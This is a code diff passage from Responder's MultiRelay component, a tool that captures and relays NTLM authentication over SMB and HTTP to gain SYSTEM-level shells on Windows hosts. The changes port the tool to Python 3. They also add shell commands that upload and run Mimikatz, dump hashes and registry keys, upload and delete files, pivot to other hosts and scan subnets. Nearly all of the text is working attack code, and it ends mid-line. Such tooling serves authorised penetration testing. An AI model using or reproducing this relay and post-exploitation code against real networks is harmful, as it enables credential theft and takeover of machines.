@@ -265,18 +345,18 @@ class HTTPRelay(BaseRequestHandler): Webdav = ServeOPTIONS(data) if Webdav: #If it is, send the option answer, we'll send him to auth when we receive a profind. - self.request.send(Webdav) + self.request.send(NetworkSendBufferPython2or3(Webdav)) data = self.request.recv(4096) NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) ##Make sure incoming packet is an NTLM auth, if not send HTTP 407. - if NTLM_Auth: + if NTLM_Auth: #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] + Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == "\x01": + if Packet_NTLM == "\x01": ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8") + h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") n = SMBNegoCairo(Data = SMBNegoCairoData()) n.calculate() packet0 = str(h)+str(n) @@ -285,335 +365,489 @@ class HTTPRelay(BaseRequestHandler): smbdata = s.recv(2048) ##Session Setup AndX Request, NTLMSSP_NEGOTIATE if smbdata[8:10] == "\x72\x00": - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") + head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# - t.calculate() + t.calculate() packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) smbdata = s.recv(2048) #got it here. - + ## Send HTTP Response. - Buffer_Ans = IIS_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb - key = ExtractHTTPChallenge(smbdata)#Grab challenge key for later use (hash parsing). - self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. + Buffer_Ans = IIS_NTLM_Challenge_Ans() + Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb + key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). + self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. data = self.request.recv(8092) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] ##Got NTLM Message 3 from client. - if Packet_NTLM == "\x03": - NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) - ##Might be anonymous, verify it and if so, send no go to client. - if IsSMBAnonymous(NTLM_Auth): - Response = IIS_Auth_401_Ans() - self.request.send(str(Response)) - data = self.request.recv(8092) - else: - #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login - #and has not attempted before. While at it, let's grab his hash. - Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host) + if Packet_NTLM == "\x03": + NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) + ##Might be anonymous, verify it and if so, send no go to client. + if IsSMBAnonymous(NTLM_Auth): + Response = IIS_Auth_401_Ans() + self.request.send(str(Response)) + data = self.request.recv(8092) + else: + #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login + #and has not attempted before. While at it, let's grab his hash. + Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting) - if Username is not None: - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00") - t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay. - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - print "[+] SMB Session Auth sent." - s.send(buffer1) - smbdata = s.recv(2048) - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) - if RunCmd is None: - s.close() - return None + if Username is not None: + head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00") + t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay. + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + print("[+] SMB Session Auth sent.") + s.send(NetworkSendBufferPython2or3(buffer1)) + smbdata = s.recv(2048) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + if RunCmd is None: + s.close() + self.request.close() + return None - else: - ##Any other type of request, send a 407. + else: + ##Any other type of request, send a 401. Response = IIS_Auth_401_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) except Exception: - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass class SMBRelay(BaseRequestHandler): - - def handle(self): + def handle(self): try: #Don't handle requests while a shell is open. That's the goal after all. if IsShellOpen(): - return None + return None except: raise - s = ConnectToTarget() - try: - data = self.request.recv(4096) + s = ConnectToTarget() + + data = self.request.recv(8092) ##Negotiate proto answer. That's us. - if data[8:10] == "\x72\x00": - head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc7", pid=pidcalc(data),mid=midcalc(data)) - t = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(data)) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - self.request.send(buffer1) + if data[8:10] == b'\x72\x00': + Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data)) + Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data))) + packet1 = str(Header)+str(Body) + Buffer = StructPython2or3('>i', str(packet1))+str(packet1) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(4096) ## Make sure it's not a Kerberos auth. - if data.find("NTLM") is not -1: - ## Start with nego protocol + session setup negotiate to our target. - data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s) + if data.find(b'NTLM') != -1: + ## Start with nego protocol + session setup negotiate to our target. + data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting) - ## Make sure it's not a Kerberos auth. - if data.find("NTLM") is not -1: - ##Relay all that to our client. - if data[8:10] == "\x73\x00": - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) - #NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange. - #Then simply grab the whole session setup packet except the smb header from the client and pass it to the server. - t = smbdata[36:] - packet0 = str(head)+str(t) - buffer0 = longueur(packet0)+packet0 - self.request.send(buffer0) - data = self.request.recv(4096) + ## Make sure it's not a Kerberos auth. + if data.find(b'NTLM') != -1: + ##Relay all that to our client. + if data[8:10] == b'\x73\x00': + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) + #NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange. + #Then simply grab the whole session setup packet except the smb header from the client and pass it to the server. + t = smbdata[36:].decode('latin-1') + packet0 = str(head)+str(t) + buffer0 = longueur(packet0)+packet0 + self.request.send(NetworkSendBufferPython2or3(buffer0)) + data = self.request.recv(4096) else: - #if it's kerberos, ditch the connection. - s.close() - return None + #if it's kerberos, ditch the connection. + s.close() + return None - if IsSMBAnonymous(data): + if IsSMBAnonymous(NetworkSendBufferPython2or3(data)): ##Send logon failure for anonymous logins. - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) t = SMBSessEmpty() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 - self.request.send(buffer1) - #data = self.request.recv(4096) ##Make him feel bad, ditch the connection. + self.request.send(NetworkSendBufferPython2or3(buffer1)) s.close() return None else: #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login #and has not attempted before. While at it, let's grab his hash. - Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host) + Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting) if Username is not None: ##Got the ntlm message 3, send it over to SMB. - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00") - t = data[36:]#Final relay. + head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00") + t = data[36:].decode('latin-1')#Final relay. packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - print "[+] SMB Session Auth sent." - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + if Pivoting[0] == "1": + pass + else: + print("[+] SMB Session Auth sent.") + s.send(NetworkSendBufferPython2or3(buffer1)) smbdata = s.recv(4096) #We're all set, dropping into shell. - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) #If runcmd is None it's because tree connect was denied for this user. - #This will only happen once with that specific user account. + #This will only happen once with that specific user account. #Let's kill that connection so we can force him to reauth with another account. if RunCmd is None: s.close() return None else: - ##Send logon failure, so our client might authenticate with another account. - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) - t = SMBSessEmpty() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - self.request.send(buffer1) - data = self.request.recv(4096) - s.close() - return None + ##Send logon failure, so our client might authenticate with another account. + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) + t = SMBSessEmpty() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + self.request.send(NetworkSendBufferPython2or3(buffer1)) + data = self.request.recv(4096) + self.request.close() + return None except Exception: - s.close() - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass #Interface starts here. -def RunShellCmd(data, s, clientIP, Host, Username, Domain): +def RunShellCmd(data, s, clientIP, Target, Username, Domain): + + #Let's declare our globals here.. + #Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode. + global Pivoting + #Update Host, when pivoting is used. + global Host + #Make sure we don't open 2 shell at the same time.. + global ShellOpen + ShellOpen = ["Shell is open"] + # On this block we do some verifications before dropping the user into the shell. - if data[8:10] == "\x73\x6d": - print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target." - print "[+] Hashes were saved anyways in Responder/logs/ folder.\n" - Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure") + if data[8:10] == b'\x73\x6d': + print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.") + print("[+] Hashes were saved anyways in Responder/logs/ folder.\n") + Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") + del ShellOpen[:] return False - if data[8:10] == "\x73\x8d": - print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n" - Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure") + if data[8:10] == b'\x73\x8d': + print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n") + Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") + del ShellOpen[:] return False - if data[8:10] == "\x73\x5e": - print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n" + if data[8:10] == b'\x73\x5e': + print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n") + del ShellOpen[:] return False - ## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$: + ## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$: ## Tree Connect - if data[8:10] == "\x73\x00": + if data[8:10] == b'\x73\x00': GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session. - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) - t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$") - t.calculate() + head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$") + t.calculate() packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## Nope he doesn't. - if data[8:10] == "\x75\x22": - print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n" - Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure") + if data[8:10] == b'\x75\x22': + if Pivoting[0] == "1": + pass + else: + print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n") + Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") + del ShellOpen[:] return False - # This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. - if data[8:10] == "\x75\xcc": - print "[+] Tree Connect AndX denied. Bad Network Name returned." + # This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. + if data[8:10] == b'\x75\xcc': + print("[+] Tree Connect AndX denied. Bad Network Name returned.") + del ShellOpen[:] return False ## Tree Connect on C$ is successfull. - if data[8:10] == "\x75\x00": - print "[+] Looks good, "+Username+" has admin rights on C$." - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) - t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$") - t.calculate() + if data[8:10] == b'\x75\x00': + if Pivoting[0] == "1": + pass + else: + print("[+] Looks good, "+Username+" has admin rights on C$.") + head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$") + t.calculate() packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## Run one command. - if data[8:10] == "\x75\x00" and OneCommand != None or Dump: - print "[+] Authenticated." + if data[8:10] == b'\x75\x00' and OneCommand != None or Dump: + print("[+] Authenticated.") if OneCommand != None: - print "[+] Running command: %s"%(OneCommand) - RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Host) + print("[+] Running command: %s"%(OneCommand)) + RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0]) if Dump: - print "[+] Dumping hashes" - DumpHashes(data, s, Host) + print("[+] Dumping hashes") + DumpHashes(data, s, Target[0]) os._exit(1) ## Drop into the shell. - if data[8:10] == "\x75\x00" and OneCommand == None: - print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n" - ShowHelp() - #Make sure we don't open 2 shell at the same time.. - global ShellOpen - ShellOpen = ["Shell is open"] + if data[8:10] == b'\x75\x00' and OneCommand == None: + if Pivoting[0] == "1": + pass + else: + print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n") + ShowHelp() + Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired") + print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1)) while True: ## We either just arrived here or we're back from a command operation, let's setup some stuff. - if data[8:10] == "\x75\x00": - #start a thread for raw_input, so we can do other stuff while we wait for a command. + if data[8:10] == b'\x75\x00': + #start a thread for raw_input, so we can do other stuff while we wait for a command. t = Thread(target=get_command, args=()) + t.daemon = True t.start() - t.join() - #For now, this is not functionning as expected. The SMB echos are killing the connection - #way faster than if we let the connection time_wait (after 2 tree connect [1 IPC & 1 C$]) itself. - #So let's use the tree connects wait (average time before timeout:5-12h) - """ + + #Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation + #to maintain MultiRelay alive and well. + count = 0 + DoEvery = random.randint(10, 45) while any(x in Cmd for x in Cmd) is False: + count = count+1 SMBKeepAlive(s, data) - time.sleep(20) - pass - """ + if count == DoEvery: + DumbSMBChain(data, s, Target[0]) + count = 0 + if any(x in Cmd for x in Cmd) is True: + break ##Grab the commands. Cmd is global in get_command(). - Read = re.findall(r'(?<=read )[^\r]*', Cmd[0]) - RegDump = re.findall(r'(?<=regdump )[^\r]*', Cmd[0]) - Get = re.findall(r'(?<=get )[^\r]*', Cmd[0]) - Help = re.findall(r'(?<=help)[^\r]*', Cmd[0]) + DumpReg = re.findall('^dump', Cmd[0]) + Read = re.findall('^read (.*)$', Cmd[0]) + RegDump = re.findall('^regdump (.*)$', Cmd[0]) + Get = re.findall('^get (.*)$', Cmd[0]) + Upload = re.findall('^upload (.*)$', Cmd[0]) + Delete = re.findall('^delete (.*)$', Cmd[0]) + RunAs = re.findall('^runas (.*)$', Cmd[0]) + LCmd = re.findall('^lcmd (.*)$', Cmd[0]) + Mimi = re.findall('^mimi (.*)$', Cmd[0]) + Mimi32 = re.findall('^mimi32 (.*)$', Cmd[0]) + Scan = re.findall('^scan (.*)$', Cmd[0]) + Pivot = re.findall('^pivot (.*)$', Cmd[0]) + Help = re.findall('^help', Cmd[0]) if Cmd[0] == "exit": - print "[+]Returning in relay mode." - del Cmd[:] - del ShellOpen[:] - return None + print("[+] Returning in relay mode.") + del Cmd[:] + del ShellOpen[:] + return None - ##For all of the following commands we send the data (var:data) returned by the - ##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore. + ##For all of the following commands we send the data (var: data) returned by the + ##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore. ##We also clean up the command array when done. - if Cmd[0] == "dump": - data = DumpHashes(data, s, Host) - del Cmd[:] + if DumpReg: + data = DumpHashes(data, s, Target[0]) + del Cmd[:] if Read: - File = Read[0] - data = ReadFile(data, s, File, Host) - del Cmd[:] + File = Read[0] + data = ReadFile(data, s, File, Target[0]) + del Cmd[:] if Get: - File = Get[0] - data = GetAfFile(data, s, File, Host) - del Cmd[:] + File = Get[0] + data = GetAfFile(data, s, File, Target[0]) + del Cmd[:] + + if Upload: + File = Upload[0] + if os.path.isfile(File): + FileSize, FileContent = UploadContent(File) + File = os.path.basename(File) + data = WriteFile(data, s, File, FileSize, FileContent, Target[0]) + del Cmd[:] + else: + print(File+" does not exist, please specify a valid file.") + del Cmd[:] + + if Delete: + Filename = Delete[0] + data = DeleteFile(data, s, Filename, Target[0]) + del Cmd[:] if RegDump: - Key = RegDump[0] - data = SaveAKey(data, s, Host, Key) - del Cmd[:] + Key = RegDump[0] + data = SaveAKey(data, s, Target[0], Key) + del Cmd[:] + + if RunAs: + if os.path.isfile(RunAsFileName): + FileSize, FileContent = UploadContent(RunAsFileName) + FileName = os.path.basename(RunAsFileName) + data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) + Exec = RunAs[0] + data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName) + del Cmd[:] + else: + print(RunAsFileName+" does not exist, please specify a valid file.") + del Cmd[:] + + if LCmd: + subprocess.call(LCmd[0], shell=True) + del Cmd[:] + + if Mimi: + if os.path.isfile(MimikatzFilename): + FileSize, FileContent = UploadContent(MimikatzFilename) + FileName = os.path.basename(MimikatzFilename) + data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) + Exec = Mimi[0] + data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) + del Cmd[:] + else: + print(MimikatzFilename+" does not exist, please specify a valid file.") + del Cmd[:] + + if Mimi32: + if os.path.isfile(Mimikatzx86Filename): + FileSize, FileContent = UploadContent(Mimikatzx86Filename) + FileName = os.path.basename(Mimikatzx86Filename) + data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) + Exec = Mimi32[0] + data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) + del Cmd[:] + else: + print(Mimikatzx86Filename+" does not exist, please specify a valid file.") + del Cmd[:] + + if Pivot: + if Pivot[0] == Target[0]: + print("[Pivot Verification Failed]: You're already on this host. No need to pivot.") + del Pivot[:] + del Cmd[:] + else: + if ShowSigning(Pivot[0]): + del Pivot[:] + del Cmd[:] + else: + if os.path.isfile(RunAsFileName): + FileSize, FileContent = UploadContent(RunAsFileName) + FileName = os.path.basename(RunAsFileName) + data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) + RunAsPath = '%windir%\\Temp\\'+FileName + Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName) + + if Status == True: + print("[+] Pivoting to %s."%(Pivot[0])) + if os.path.isfile(RunAsFileName): + FileSize, FileContent = UploadContent(RunAsFileName) + data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) + #shell will close. + del ShellOpen[:] + #update the new host. + Host = [Pivot[0]] + #we're in pivoting mode. + Pivoting = ["1"] + data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName) + del Cmd[:] + s.close() + return None + + if Status == False: + print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.") + del Cmd[:] + del Pivot[:] + else: + print(RunAsFileName+" does not exist, please specify a valid file.") + del Cmd[:] + + if Scan: + LocalIp = FindLocalIp() + Range = ConvertToClassC(Target[0], Scan[0]) + RunPivotScan(Range, Target[0]) + del Cmd[:] if Help: - ShowHelp() - del Cmd[:] + ShowHelp() + del Cmd[:] ##Let go with the command. if any(x in Cmd for x in Cmd): if len(Cmd[0]) > 1: - data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Host) - del Cmd[:] - + if os.path.isfile(SysSVCFileName): + FileSize, FileContent = UploadContent(SysSVCFileName) + FileName = os.path.basename(SysSVCFileName) + RunPath = '%windir%\\Temp\\'+FileName + data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) + data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName) + del Cmd[:] + else: + print(SysSVCFileName+" does not exist, please specify a valid file.") + del Cmd[:] + if isinstance(data, str): + data = data.encode('latin-1') if data is None: - print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure the server (\\Windows\\Temp\\) is clean\033[0m\n" + print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n") - if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop. - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) - t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")# - t.calculate() + if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop. + head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")# + t.calculate() packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) class ThreadingTCPServer(TCPServer): - def server_bind(self): - TCPServer.server_bind(self) + def server_bind(self): + TCPServer.server_bind(self) ThreadingTCPServer.allow_reuse_address = 1 ThreadingTCPServer.daemon_threads = True def serve_thread_tcp(host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except: - print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1) + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except: + print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)) def main(): - try: - threads = [] - threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,))) - if ExtraPort != 0: - threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,))) - for thread in threads: - thread.setDaemon(True) - thread.start() + try: + threads = [] + threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,))) + threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,))) + threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,))) + if ExtraPort != 0: + threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,))) + for thread in threads: + thread.setDaemon(True) + thread.start() - while True: - time.sleep(1) + while True: + time.sleep(1) - except (KeyboardInterrupt, SystemExit): - sys.exit("\rExiting...") + except (KeyboardInterrupt, SystemExit): + ##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default. + ##This is a bug in python readline when dealing with raw_input().. + if ShellOpen: + os.system('stty sane') + ##Then exit + sys.exit("\rExiting...") if __name__ == '__main__': - main() + main() diff --git a/tools/MultiRelay/RelayMultiCore.py b/tools/MultiRelay/RelayMultiCore.py index 20ccfdb..3c1fa2d 100644 --- a/tools/MultiRelay/RelayMultiCore.py +++ b/tools/MultiRelay/RelayMultiCore.py @@ -1,5 +1,6 @@ #!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools +# -*- coding: latin-1 -*- +# This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com # This program is free software: you can redistribute it and/or modify @@ -14,19 +15,31 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -import struct import sys +if (sys.version_info > (3, 0)): + PY2OR3 = "PY3" +else: + PY2OR3 = "PY2" +import struct import random import time import os +import binascii import re import datetime -from RelayMultiPackets import * +import threading +import uuid +import codecs +import sys +from .RelayMultiPackets import * from odict import OrderedDict from base64 import b64decode, b64encode -sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump'))) -from framework.win32.hashdump import dump_file_hashes + +sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'impacket-dev/'))) +from secretsdump import DumpSecrets + from SMBFinger.Finger import ShowSmallResults +from socket import * SaveSam_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/relay-dumps/" Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../../" @@ -34,10 +47,8 @@ Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../../" READTIMEOUT = 1 READ = "\xc0\x00" RW = "\xc2\x00" - -def longueur(payload): - length = struct.pack(">i", len(''.join(payload))) - return length +MimiKatzSVCName = "" +MimiKatzSVCID = "" class Packet(): fields = OrderedDict([ @@ -45,35 +56,55 @@ class Packet(): ]) def __init__(self, **kw): self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): + for k,v in list(kw.items()): if callable(v): self.fields[k] = v(self.fields[k]) else: self.fields[k] = v def __str__(self): - return "".join(map(str, self.fields.values())) + return "".join(map(str, list(self.fields.values()))) + +def StructWithLenPython2or3(endian,data): + #Python2... + if PY2OR3 == "PY2": + return struct.pack(endian, data) + #Python3... + else: + return struct.pack(endian, data).decode('latin-1') + +def NetworkSendBufferPython2or3(data): + if PY2OR3 == "PY2": + return str(data) + else: + return bytes(str(data), 'latin-1') + +def NetworkRecvBufferPython2or3(data): + if PY2OR3 == "PY2": + return str(data) + else: + return str(data.decode('latin-1')) # Function used to write captured hashs to a file. def WriteData(outfile, data, user): - if not os.path.isfile(outfile): - with open(outfile,"w") as outf: - outf.write(data + '\n') - return - with open(outfile,"r") as filestr: - if re.search(user.encode('hex'), filestr.read().encode('hex')): - return False - elif re.search(re.escape("$"), user): - return False - with open(outfile,"a") as outf2: - outf2.write(data + '\n') + if not os.path.isfile(outfile): + with open(outfile,"w") as outf: + outf.write(data + '\n') + return + with open(outfile,"rb") as filestr: + if re.search(NetworkSendBufferPython2or3(user), filestr.read()): + return False + elif re.search(re.escape(b'$'), NetworkSendBufferPython2or3(user)): + return False + with open(outfile,"a") as outf2: + outf2.write(data + '\n') #Function used to verify if a previous auth attempt was made. def ReadData(Outfile, Client, User, Domain, Target, cmd): try: - with open(Logs_Path+"logs/"+Outfile,"r") as filestr: - Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure" - if re.search(Login.encode('hex'), filestr.read().encode('hex')): - print "[+] User %s\\%s previous login 